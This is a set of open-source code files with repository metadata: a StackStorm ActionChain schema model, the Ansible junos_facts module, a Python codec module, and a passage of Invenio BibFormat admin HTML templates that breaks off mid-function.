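    results.addPageResult(1, 'http://www.example.com/', 'Info',
                          'Example per-page finding', 'finding data')
    return results.toHTML()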
|
gpl-3.0
|
dennybaa/st2
|
st2common/st2common/models/system/actionchain.py
|
8
|
5983
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import string
from st2common.util import schema as util_schema
from st2common.models.api.notification import NotificationSubSchemaAPI
class Node(object):
schema = {
"title": "Node",
"description": "Node of an ActionChain.",
"type": "object",
"properties": {
"name": {
"description": "The name of this node.",
"type": "string",
"required": True
},
"ref": {
"type": "string",
"description": "Ref of the action to be executed.",
"required": True
},
"params": {
"type": "object",
"description": ("Parameter for the execution (old name, here for backward "
"compatibility reasons)."),
"default": {}
},
"parameters": {
"type": "object",
"description": "Parameter for the execution.",
"default": {}
},
"on-success": {
"type": "string",
"description": "Name of the node to invoke on successful completion of action"
" executed for this node.",
"default": ""
},
"on-failure": {
"type": "string",
"description": "Name of the node to invoke on failure of action executed for this"
" node.",
"default": ""
},
"publish": {
"description": "The variables to publish from the result. Should be of the form"
" name.foo. o1: {{node_name.foo}} will result in creation of a"
" variable o1 which is now available for reference through"
" remainder of the chain as a global variable.",
"type": "object",
"patternProperties": {
"^\w+$": {}
}
},
"notify": {
"description": "Notification settings for action.",
"type": "object",
"properties": {
"on-complete": NotificationSubSchemaAPI,
"on-failure": NotificationSubSchemaAPI,
"on-success": NotificationSubSchemaAPI
},
"additionalProperties": False
}
},
"additionalProperties": False
}
def __init__(self, **kw):
for prop in six.iterkeys(self.schema.get('properties', [])):
value = kw.get(prop, None)
# having '-' in the property name leads to challenges in referencing the property.
# In hindsight the schema property should've been on_success rather than on-success.
prop = string.replace(prop, '-', '_')
setattr(self, prop, value)
def validate(self):
params = getattr(self, 'params', {})
parameters = getattr(self, 'parameters', {})
if params and parameters:
msg = ('Either "params" or "parameters" attribute needs to be provided, but not '
'both')
raise ValueError(msg)
return self
def get_parameters(self):
# Note: "params" is old deprecated attribute which will be removed in a future release
params = getattr(self, 'params', {})
parameters = getattr(self, 'parameters', {})
return parameters or params
def __repr__(self):
return ('<Node name=%s, ref=%s, on-success=%s, on-failure=%s>' %
(self.name, self.ref, self.on_success, self.on_failure))
class ActionChain(object):
schema = {
"title": "ActionChain",
"description": "A chain of sequentially executed actions.",
"type": "object",
"properties": {
"chain": {
"description": "The chain.",
"type": "array",
"items": [Node.schema],
"required": True
},
"default": {
"type": "string",
"description": "name of the action to be executed."
},
"vars": {
"description": "",
"type": "object",
"patternProperties": {
"^\w+$": {}
}
}
},
"additionalProperties": False
}
def __init__(self, **kw):
util_schema.validate(instance=kw, schema=self.schema, cls=util_schema.CustomValidator,
use_default=False, allow_default_none=True)
for prop in six.iterkeys(self.schema.get('properties', [])):
value = kw.get(prop, None)
# special handling for chain property to create the Node object
if prop == 'chain':
nodes = []
for node in value:
ac_node = Node(**node)
ac_node.validate()
nodes.append(ac_node)
value = nodes
setattr(self, prop, value)
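# ---------------------------------------------------------------------------
# Editor's note: a hedged sketch of constructing an ActionChain from a
# minimal chain definition. The action refs, node names and parameters are
# illustrative only; real definitions normally come from a parsed chain file.
def _example_chain():
    definition = {
        'chain': [
            {'name': 'step1', 'ref': 'core.local',
             'parameters': {'cmd': 'echo hello'}, 'on-success': 'step2'},
            {'name': 'step2', 'ref': 'core.local',
             'parameters': {'cmd': 'echo done'}},
        ],
        'default': 'step1',
    }
    return ActionChain(**definition)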
|
apache-2.0
|
peter-jang/ansible-modules-core
|
network/junos/junos_facts.py
|
19
|
4038
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_facts
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Collect facts from remote device running Junos
description:
- Collects fact information from a remote device running the Junos
operating system. By default, the module will collect basic fact
information from the device to be included with the hostvars.
Additional fact information can be collected based on the
configured set of arguments.
extends_documentation_fragment: junos
options:
config:
description:
- The C(config) argument instructs the fact module to collect
the configuration from the remote device. The configuration
is then included in return facts. By default, the configuration
is returned as text. The C(config_format) can be used to return
different Junos configuration formats.
required: false
default: null
config_format:
description:
- The C(config_format) argument is used to specify the desired
format of the configuration file. Devices support three
configuration file formats. By default, the configuration
from the device is returned as text. The other options include
set and xml. If the xml option is chosen, the configuration file
is returned as both xml and json.
required: false
default: text
choices: ['xml', 'text', 'set']
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed
"""
EXAMPLES = """
# the required set of connection arguments have been purposely left off
# the examples for brevity
- name: collect default set of facts
junos_facts:
- name: collect default set of facts and configuration
junos_facts:
config: yes
- name: collect default set of facts and configuration in set format
junos_facts:
config: yes
config_format: set
- name: collect default set of facts and configuration in XML and JSON format
junos_facts:
config: yes
config_format: xml
"""
RETURN = """
ansible_facts:
description: Returns the facts collected from the device
returned: always
type: dict
"""
def main():
""" Main entry point for AnsibleModule
"""
spec = dict(
config=dict(type='bool'),
config_format=dict(default='text', choices=['xml', 'set', 'text']),
transport=dict(default='netconf', choices=['netconf'])
)
module = get_module(argument_spec=spec,
supports_check_mode=True)
result = dict(changed=False)
facts = module.get_facts()
if '2RE' in facts:
facts['has_2RE'] = facts['2RE']
del facts['2RE']
facts['version_info'] = dict(facts['version_info'])
if module.params['config'] is True:
config_format = module.params['config_format']
resp_config = module.get_config(config_format=config_format)
if config_format in ['text', 'set']:
facts['config'] = resp_config
elif config_format == "xml":
facts['config'] = xml_to_string(resp_config)
facts['config_json'] = xml_to_json(resp_config)
result['ansible_facts'] = facts
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.junos import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
381426068/MissionPlanner
|
Lib/encodings/unicode_internal.py
|
103
|
1241
|
""" Python 'unicode-internal' Codec
Written by Marc-Andre Lemburg ([email protected]).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
# Note: Binding these as C functions will result in the class not
# converting them to methods. This is intended.
encode = codecs.unicode_internal_encode
decode = codecs.unicode_internal_decode
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.unicode_internal_encode(input, self.errors)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.unicode_internal_decode(input, self.errors)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='unicode-internal',
encode=Codec.encode,
decode=Codec.decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
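# ---------------------------------------------------------------------------
# Editor's note: a hedged usage sketch. In practice this codec is reached
# through the standard codecs registry rather than by importing this module:
#
#     data = u'abc'.encode('unicode_internal')
#     text = data.decode('unicode_internal')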
|
gpl-3.0
|
lnielsen/invenio
|
invenio/legacy/bibformat/templates.py
|
3
|
75703
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""HTML Templates for BibFormat administration"""
__revision__ = "$Id$"
# non Invenio imports
import cgi
from flask import url_for
# Invenio imports
from invenio.base.i18n import gettext_set_language
from invenio.config import CFG_SITE_URL, CFG_SITE_SECURE_URL
from invenio.base.i18n import language_list_long
MAX_MAPPINGS = 100 #show at most this number of mappings on one page
class Template(object):
"""Templating class, refer to bibformat.py for examples of call"""
def tmpl_admin_index(self, ln, warnings, is_admin):
"""
Returns the main BibFormat admin page.
@param ln: language
@param warnings: a list of warnings to display at top of page. None if no warning
@param is_admin: indicate if user is authorized to use BibFormat
@return: main BibFormat admin page
"""
_ = gettext_set_language(ln) # load the right message language
out = ''
if warnings:
out += '''
<table width="66%%" class="errorbox" style="margin-left: auto; margin-right: auto;">
<tr>
<th class="errorboxheader">
%(warnings)s
</th>
</tr>
</table>
''' % {'warnings': '<br/>'.join(warnings)}
out += '''
<p>
This is where you can edit the formatting styles available for the records. '''
if not is_admin:
out += '''You need to
<a href="%(siteurl)s/youraccount/login?referer=%(siteurl)s/admin/bibformat/bibformatadmin.py">login</a> to enter.
''' % {'siteurl': CFG_SITE_URL}
out += '''
</p>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_templates_manage?ln=%(ln)s">Manage Format Templates</a></dt>
<dd>Define how to format a record.</dd>
</dl>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/output_formats_manage?ln=%(ln)s">Manage Output Formats</a></dt>
<dd>Define which template is applied to which record for a given output.</dd>
</dl>
<br/>
<dl>
<dt><a href="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_elements_doc?ln=%(ln)s">Format Elements Documentation</a></dt>
<dd>Documentation of the format elements to be used inside format templates.</dd>
</dl>
<dl>
<dt><a href="%(siteurl)s/help/admin/bibformat-admin-guide">BibFormat Admin Guide</a></dt>
<dd>Documentation about BibFormat administration</dd>
</dl>
'''% {'siteurl': CFG_SITE_URL, 'ln': ln}
return out
def tmpl_admin_format_template_show_attributes(self, ln, name, description, filename, editable,
all_templates=[], new=False):
"""
Returns a page to change format template name and description
If template is new, offer a way to create a duplicate from an
existing template
@param ln: language
@param name: the name of the format
@param description: the description of the format
@param filename: the filename of the template
@param editable: True if we let user edit, else False
@param all_templates: a list of tuples (filename, name) of all other templates
@param new: if True, the format template has just been added (is new)
@return: editor for 'format'
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
out += '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a></small> </td>
<td>1. <small><a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(template_editor)s</a></small> </td>
<td>2. <small>%(modify_template_attributes)s</small> </td>
<td>3. <small><a href="format_template_show_dependencies?ln=%(ln)s&bft=%(filename)s">%(check_dependencies)s</a></small> </td>
</tr>
</table><br/>
''' % {'ln': ln,
'menu': _("Menu"),
'filename': filename,
'close_editor': _("Close Editor"),
'modify_template_attributes': _("Modify Template Attributes"),
'template_editor': _("Template Editor"),
'check_dependencies': _("Check Dependencies")
}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
out += '''
<form action="format_template_update_attributes?ln=%(ln)s&bft=%(filename)s" method="POST">
''' % {'ln': ln,
'filename': filename}
if new:
#Offer the possibility to make a duplicate of existing format template code
out += '''
<table><tr>
<th class="adminheaderleft">Make a copy of format template: [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#addFormatTemplate">?</a>]</th>
</tr>
<tr>
<td><select tabindex="1" name="duplicate" id="duplicate" %(readonly)s>
<option value="">None (Blank Page)</option>
<option value="" disabled="disabled">-------------</option>
''' % {'siteurl': CFG_SITE_URL,
'readonly': readonly}
for o_filename, o_name in all_templates:
out += '''<option value="%(template_filename)s">%(template_name)s</option>''' % {'template_name': o_name,
'template_filename': o_filename}
out += ''' </select>
</td></tr></table>'''
out += '''
<table><tr>
<th colspan="2" class="adminheaderleft">%(name)s attributes [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#attrsFormatTemplate">?</a>]</th>
</tr>
<tr>
<td class="admintdright">
<input type="hidden" name="key" value="%(name)s"/>
<label for="name">%(name_label)s</label>: </td>
<td><input tabindex="2" name="name" type="text" id="name" size="25" value="%(name)s" %(readonly)s/>
<input type="hidden" value="%(filename)s"/>
</td>
</tr>
''' % {'name': name,
'filename': filename,
'readonly': readonly,
'name_label': _("Name"),
'siteurl': CFG_SITE_URL
}
out += '''
<tr>
<td class="admintdright" valign="top"><label for="description">%(description_label)s</label>: </td>
<td><textarea tabindex="3" name="description" id="description" rows="4" cols="25" %(readonly)s>%(description)s</textarea> </td>
</tr>
<tr>
<td> </td>
<td align="right"><input tabindex="6" class="adminbutton" type="submit" value="%(update_format_attributes)s" %(disabled)s/></td>
</tr>
</table></form>
''' % {"description": description,
'disabled': disabled,
'readonly': readonly,
'description_label': _("Description"),
'update_format_attributes': _("Update Format Attributes"),
}
return out
def tmpl_admin_format_template_show_dependencies(self, ln, name, filename, output_formats, format_elements, tags):
"""
Shows the dependencies (on elements) of the given format.
@param ln: language
@param name: the name of the template
@param filename: the filename of the template
@param format_elements: the elements (and list of tags in each element) this template depends on
@param output_formats: the output format that depend on this template
@param tags: the tags that are called by format elements this template depends on.
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a> </small></td>
<td>1. <small><a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(template_editor)s</a></small> </td>
<td>2. <small><a href="format_template_show_attributes?ln=%(ln)s&bft=%(filename)s">%(modify_template_attributes)s</a></small> </td>
<td>3. <small>%(check_dependencies)s</small> </td>
</tr>
</table>
<table width="90%%" class="admin_wvar" cellspacing="0"><tr>
<th class="adminheaderleft">Output Formats that use %(name)s</th>
<th class="adminheaderleft">Format Elements used by %(name)s*</th>
<th class="adminheaderleft">All Tags Called*</th>
</tr>
<tr>
<td valign="top"> <br/>
''' % {'ln': ln,
'filename': filename,
'menu': _("Menu"),
'close_editor': _("Close Editor"),
'modify_template_attributes': _("Modify Template Attributes"),
'template_editor': _("Template Editor"),
'check_dependencies': _("Check Dependencies"),
'name': name}
#Print output formats
if len(output_formats) == 0:
out += '<p align="center"><i>No output format uses this format template.</i></p>'
for output_format in output_formats:
name = output_format['names']['generic']
filename = output_format['filename']
out += ''' <a href="output_format_show?ln=%(ln)s&bfo=%(filename)s">%(name)s</a>''' % {'filename': filename,
'name': name,
'ln': ln}
if len(output_format['tags']) > 0:
out += "("+", ".join(output_format['tags'])+")"
out += "<br/>"
#Print format elements (and tags)
out += '</td><td valign="top"> <br/>'
if len(format_elements) == 0:
out += '<p align="center"><i>This format template uses no format element.</i></p>'
for format_element in format_elements:
name = format_element['name']
out += ''' <a href="format_elements_doc?ln=%(ln)s#%(anchor)s">%(name)s</a>''' % {'name': "bfe_"+name.lower(),
'anchor': name.upper(),
'ln': ln}
if len(format_element['tags']) > 0:
out += "("+", ".join(format_element['tags'])+")"
out += "<br/>"
#Print tags
out += '</td><td valign="top"> <br/>'
if len(tags) == 0:
out += '<p align="center"><i>This format template uses no tag.</i></p>'
for tag in tags:
out += '''%(tag)s<br/>''' % {'tag': tag}
out += '''
</td>
</tr>
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_template_show(self, ln, code, filename,
ln_for_preview, pattern_for_preview,
editable, content_type_for_preview,
content_types):
"""
Returns the editor for format templates. Edit format with given X{name}
@param ln: language
@param name: the format to edit
@param description: the description of the format template
@param code: the code of the template of the editor
@param filename: the filename of the template
@param ln_for_preview: the language for the preview (for bfo)
@param pattern_for_preview: the search pattern to be used for the preview (for bfo)
@param editable: True if we let user edit, else False
@param content_type_for_preview: content-type to use for preview
@param content_types: list of available content-types
@return: editor for 'format'
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
# If xsl, hide some options in the menu
nb_menu_options = 4
if filename.endswith('.xsl'):
nb_menu_options = 2
out += '''
<style type="text/css">
<!--
.ed_button {
font-size: x-small;
}
-->
</style>
<script src="%(quicktags)s" type="text/javascript"></script>
<script type="text/javascript">
/* Ask user confirmation before leaving page */
var user_must_confirm_before_leaving_page = false;
window.onbeforeunload = confirmExit;
function confirmExit() {
if (user_must_confirm_before_leaving_page)
return "%(leave_editor_message)s";
}
function getByID( id ) {
if (document.getElementById)
var returnVar = document.getElementById(id);
else if (document.all)
var returnVar = document.all[id];
else if (document.layers)
var returnVar = document.layers[id];
return returnVar;
}
window.onresize= resizeViews;
window.onload= prepareLayout;
function prepareLayout(){
resizeViews();
}
function resizeViews(){
var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
//IE 6+ in 'standards compliant mode'
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
//IE 4 compatible
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}
if (myHeight <= 400) {
getByID("code").style.height=10;
getByID("previewiframe").style.height=10;
} else{
getByID("code").style.height=((myHeight-400)/2);
getByID("previewiframe").style.height=((myHeight-400)/2);
}
getByID("previewiframe").style.height=200;
// Resize documentation
var height = document.documentElement.clientHeight;
height -= getByID('shortDocFrame').offsetTop
//height -= 20;
getByID('shortDocFrame').style.height = height +"px";
}
</script>
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="%(nb_menu_options)s" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(close_editor)s</a></small> </td>
<td>1. <small>%(template_editor)s</small> </td>
''' % {'ln': ln,
'menu': _("Menu"),
'close_editor': _("Close Editor"),
'template_editor': _("Template Editor"),
'nb_menu_options': nb_menu_options,
'siteurl': CFG_SITE_SECURE_URL or CFG_SITE_URL,
'leave_editor_message': _('Your modifications will not be saved.').replace('"', '\\"'),
'quicktags': url_for('formatter.static',
filename='js/formatter/quicktags.js'),
}
if not filename.endswith('.xsl'):
out +='''<td>2. <small><a href="format_template_show_attributes?ln=%(ln)s&bft=%(filename)s">%(modify_template_attributes)s</a></small> </td>
<td>3. <small><a href="format_template_show_dependencies?ln=%(ln)s&bft=%(filename)s">%(check_dependencies)s</a></small> </td>
''' % {'ln': ln,
'filename': filename,
'modify_template_attributes': _("Modify Template Attributes"),
'check_dependencies': _("Check Dependencies"),
}
out +='''
</tr>
</table>
<script type="text/javascript">
function toggle_doc_visibility(){
var doc = document.getElementById('docTable');
var link = document.getElementById('docLink');
if (doc.style.display=='none'){
doc.style.display = '';
link.innerHTML = "%(label_hide_doc)s"
} else {
doc.style.display = 'none';
link.innerHTML = "%(label_show_doc)s"
}
}
</script>
''' % {'label_show_doc': _("Show Documentation"),
'label_hide_doc': _("Hide Documentation"),
}
disabled = ""
readonly = ""
toolbar = """<script type="text/javascript">edToolbar('%s/admin/bibformat/bibformatadmin.py/format_elements_doc?ln=%s');</script>""" % (CFG_SITE_URL, ln)
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
toolbar = ''
#First column: template code and preview
out += '''
<table width="90%%" cellspacing="5">
<tr>
<td valign="top">
<form action="format_template_show_preview_or_save?ln=%(ln)s&bft=%(filename)s" method="POST" target="previewiframe">
<table width="100%%" id="mainTable"><tr>
<th class="adminheaderleft"><div style="float:left;">Format template code</div>
<div style="float:right;">
<a id="docLink" href="#" onclick="toggle_doc_visibility()">%(label_hide_doc)s</a>
</div>
</th>
</tr>
<tr><td colspan="2" id="codetd">
%(toolbar)s
<textarea name="code" id="code" rows="25" %(readonly)s
style="width:100%%" onchange="user_must_confirm_before_leaving_page=true;">%(code)s</textarea>
<script type="text/javascript">var edCanvas = document.getElementById('code');</script>
</td></tr>
<tr><td align="right" valign="top">
<input type="submit" class="adminbutton" name="save_action" value="Save Changes" onclick="user_must_confirm_before_leaving_page=false;" %(disabled)s/>
</td>
</tr>
</table>
<table width="100%%">
<tr><th class="adminheaderleft">
Preview
</th>
</tr>
<tr><td align="right" valign="top" style="font-size: small;">
<nobr>
<label for="content_type_for_preview">Content-type (MIME):</label> <select id="content_type_for_preview" name="content_type_for_preview" style="font-size: x-small;">
''' % {'ln': ln,
'filename': filename,
'label_hide_doc': _("Hide Documentation"),
'code': code,
'readonly': readonly,
'disabled': disabled,
'toolbar': toolbar}
for content_type in content_types:
if content_type == content_type_for_preview:
out += '''<option value="%(content_type)s" selected="selected">%(content_type)s</option>''' % {'content_type': content_type}
else:
out += '''<option value="%(content_type)s">%(content_type)s</option>''' % {'content_type': content_type}
out += '''
</select></nobr>
<nobr><label for="ln_for_preview">Language:</label> <select id="ln_for_preview" name="ln_for_preview" style="font-size: x-small;">
'''
for lang in language_list_long():
if lang[0] == ln_for_preview:
out += '''<option value="%(ln)s" selected="selected">%(language)s</option>''' % {'ln': lang[0],
'language': lang[1]}
else:
out += '''<option value="%(ln)s">%(language)s</option>''' % {'ln': lang[0], 'language': lang[1]}
out += '''
</select></nobr>
<nobr><label for="pattern_for_preview">Search Pattern: </label><input type="text" value="%(pattern_for_preview)s" size="8" name="pattern_for_preview" id="pattern_for_preview" style="font-size: x-small;"/></nobr>
<input type="submit" class="adminbutton" name="preview_action" value="Reload Preview"/>
</td>
</tr>
<tr><td>
<iframe src ="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_template_show_preview_or_save?ln=%(ln)s&ln_for_preview=%(ln_for_preview)s&pattern_for_preview=%(pattern_for_preview)s&bft=%(filename)s" name="previewiframe" id="previewiframe" width="100%%" height="400"></iframe>
</td></tr>
</table>
</form>
</td>
''' % {'ln': ln,
'siteurl': CFG_SITE_URL, 'filename': filename,
'ln_for_preview': ln_for_preview,
'pattern_for_preview': pattern_for_preview
}
#Second column Print documentation
out += '''
<td valign="top" id="docTable">
<table width="100%%"><tr>
<th class="adminheaderleft">Elements Documentation</th>
</tr>
</table>
<table width="100%%"><tr>
<td class="admintdright">
<form action="format_template_show_short_doc?ln=%(ln)s" method="POST" target="shortDocFrame">
<nobr><label for="search_doc_pattern">Search for: </label><input type="text" size="15" name="search_doc_pattern" id="search_doc_pattern" value=""/> <input type="submit" class="adminbutton" name="search_in_doc" value="Search" /></nobr>
</form>
</td>
</tr>
</table>
<iframe name="shortDocFrame" id="shortDocFrame" src ="%(siteurl)s/admin/bibformat/bibformatadmin.py/format_template_show_short_doc?ln=%(ln)s" height="90%%" width="98%%"></iframe>
</td>
</tr>
</table>
''' % {'siteurl': CFG_SITE_URL, 'ln': ln}
return out
def tmpl_admin_format_template_show_short_doc(self, format_elements):
"""
Prints the format element documentation in a condensed way to display
inside format template editor.
This page is different from others: it is displayed inside a <iframe>
tag in template tmpl_admin_format_template_show.
@param ln: language
@param format_elements: a list of format elements structures as returned by get_format_elements
@return: HTML markup
"""
out = '''
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>BibFormat Short Documentation of Format Elements</title>
<link rel="stylesheet" href="%(siteurl)s/img/invenio.css">
<script src="%(quicktags)s" type="text/javascript"></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script type="text/javascript">
function toggle_visibility(element, show, r,g,b){
var children = element.childNodes
var child
for(x=0; x<children.length; x++){
if (children[x].id == 'params'){
child = children[x]
}
}
if (show=='show'){
element.style.background='rgb(201, 218, 255)'
element.style.cursor='pointer'
child.style.display=''
} else {
element.style.background="rgb("+r+","+g+","+b+")"
child.style.display='none'
}
}
///// FROM JS QuickTags ///////
// Copyright (c) 2002-2005 Alex King
// http://www.alexking.org/
//
// Licensed under the LGPL license
// http://www.gnu.org/copyleft/lesser.html
function insertAtCursor(myField, myValue) {
//IE support
if (document.selection) {
myField.focus();
sel = document.selection.createRange();
sel.text = myValue;
}
//MOZILLA/NETSCAPE support
else if (myField.selectionStart || myField.selectionStart == '0') {
var startPos = myField.selectionStart;
var endPos = myField.selectionEnd;
myField.value = myField.value.substring(0, startPos)
+ myValue
+ myField.value.substring(endPos, myField.value.length);
} else {
myField.value += myValue;
}
}
///// END FROM JS QuickTags /////
function insert_my_code_into_container(code){
var codeArea = parent.document.getElementById("code");
if (codeArea.readOnly == false){
//var clean_code = code.replace(=#,'="');
//clean_code = clean_code.replace(# ,'" ');
insertAtCursor(codeArea, code);
}
}
</script>
''' % {
'siteurl': CFG_SITE_SECURE_URL or CFG_SITE_URL,
'quicktags': url_for('formatter.static',
filename='js/formatter/quicktags.js')
}
if len(format_elements) == 0:
out += '''
<em>No format elements found</em>
'''
else:
line = 0
#Print elements doc
for format_element in format_elements:
format_attributes = format_element['attrs']
row_content = ""
name = format_attributes['name']
description = format_attributes['description']
params = [x['name'] + '=\u0022'+str(x['default'])+'\u0022' for x in format_attributes['params']]
builtin_params = [x['name'] + '=\u0022'+str(x['default'])+'\u0022' for x in format_attributes['builtin_params']]
code = "<BFE_" + name + ' ' + ' '.join(builtin_params)+ ' ' + ' '.join(params) +"/>"
if line % 2:
row_content += '''<div onmouseover="toggle_visibility(this, 'show', 235, 247, 255);"
onmouseout="toggle_visibility(this, 'hide', 235, 247, 255);"
style="background-color: rgb(235, 247, 255);"
onclick="insert_my_code_into_container('%s')"
><hr/>''' % code
else:
row_content += '''<div onmouseover="toggle_visibility(this, 'show', 255, 255, 255);"
onmouseout="toggle_visibility(this, 'hide', 255, 255, 255);"
onclick="insert_my_code_into_container('%s')"
>''' % code
row_content += '''
<code> <b><BFE_%(name)s/></b><br/></code>
<small>%(description)s.</small>
<div id="params" style="display:none;">
<ul>
''' % {'name': name, 'description': description}
for param in format_attributes['params']:
row_content += '''
<li><small><b>%(name)s</b>: %(description)s</small></li>
''' % {'name': param['name'],
'description': param['description']}
for param in format_attributes['builtin_params']:
row_content += '''
<li><small><b>%(name)s</b>: %(description)s</small></li>
''' % {'name': param['name'],
'description': param['description']}
row_content += '</ul></div>'
if line % 2:
row_content += '''<hr/></div>'''
else:
row_content += '</div>'
line += 1
out += row_content
out += '''</body></html>'''
return out
def tmpl_admin_format_templates_management(self, ln, formats):
"""
Returns the management console for formats. Includes list of formats and
associated administration tools.
@param ln: language
@param formats: a list of dictionaries with formats attributes
@return: format management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small>%(manage_format_templates)s</small> </td>
<td>1. <small><a href="output_formats_manage?ln=%(ln)s">%(manage_output_formats)s</a> </td>
<td>2. <small><a href="format_elements_doc?ln=%(ln)s">%(format_elements_documentation)s</a></small> </td>
</tr>
</table>
<p>From here you can create, edit or delete format templates.
Have a look at the <a href="format_elements_doc?ln=%(ln)s">format elements documentation</a> to
learn which elements you can use in your templates.</p>
<table class="admin_wvar" width="95%%" cellspacing="0">
<tr>
<th class="adminheaderleft" > </th>
<th class="adminheaderleft" >%(name)s</th>
<th class="adminheaderleft" >%(description)s</th>
<th class="adminheaderleft" >%(status)s</th>
<th class="adminheaderleft" >%(last_modification_date)s</th>
<th class="adminheadercenter" >%(action)s [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#formatTemplates">?</a>]</th>
</tr>
''' % {'name': _("Name"),
'description': _("Description"),
'menu': _("Menu"),
'status': _("Status"),
'last_modification_date': _("Last Modification Date"),
'action': _("Action"),
'ln': ln,
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
'siteurl': CFG_SITE_URL}
#table content: formats names, description and buttons
if len(formats) == 0:
out += '''<tr>
<td colspan="6" class="admintd" align="center"><em>No format</em></td>
</tr>'''
else:
line = 0
for attrs in formats:
filename = attrs['filename']
if filename == "":
filename = " "
name = attrs['name']
if name == "":
name = " "
description = attrs['description']
if description == "":
description = " "
last_mod_date = attrs['last_mod_date']
status = attrs['status']
disabled = ""
if not attrs['editable']:
disabled = 'disabled="disabled"'
style = 'style="vertical-align: middle;'
if line % 2:
style = 'style="vertical-align: middle;background-color: rgb(235, 247, 255);'
line += 1
row_content = '''<tr>
<td class="admintdright" %(style)s"> </td>
<td class="admintdleft" %(style)s white-space: nowrap;"><a href="format_template_show?bft=%(filename)s&ln=%(ln)s">%(name)s</a></td>
<td class="admintdleft" %(style)s" >%(description)s</td>
<td class="admintdleft" %(style)s white-space: nowrap;" >%(status)s</td>
<td class="admintdleft" %(style)s white-space: nowrap;" >%(last_mod_date)s</td>
<td class="admintd" %(style)s white-space: nowrap;">
<form method="post" action="format_template_delete?ln=%(ln)s&bft=%(filename)s">
<input class="adminbutton" type="submit" value="%(delete)s" %(disabled)s/>
</form>
</td>
</tr>
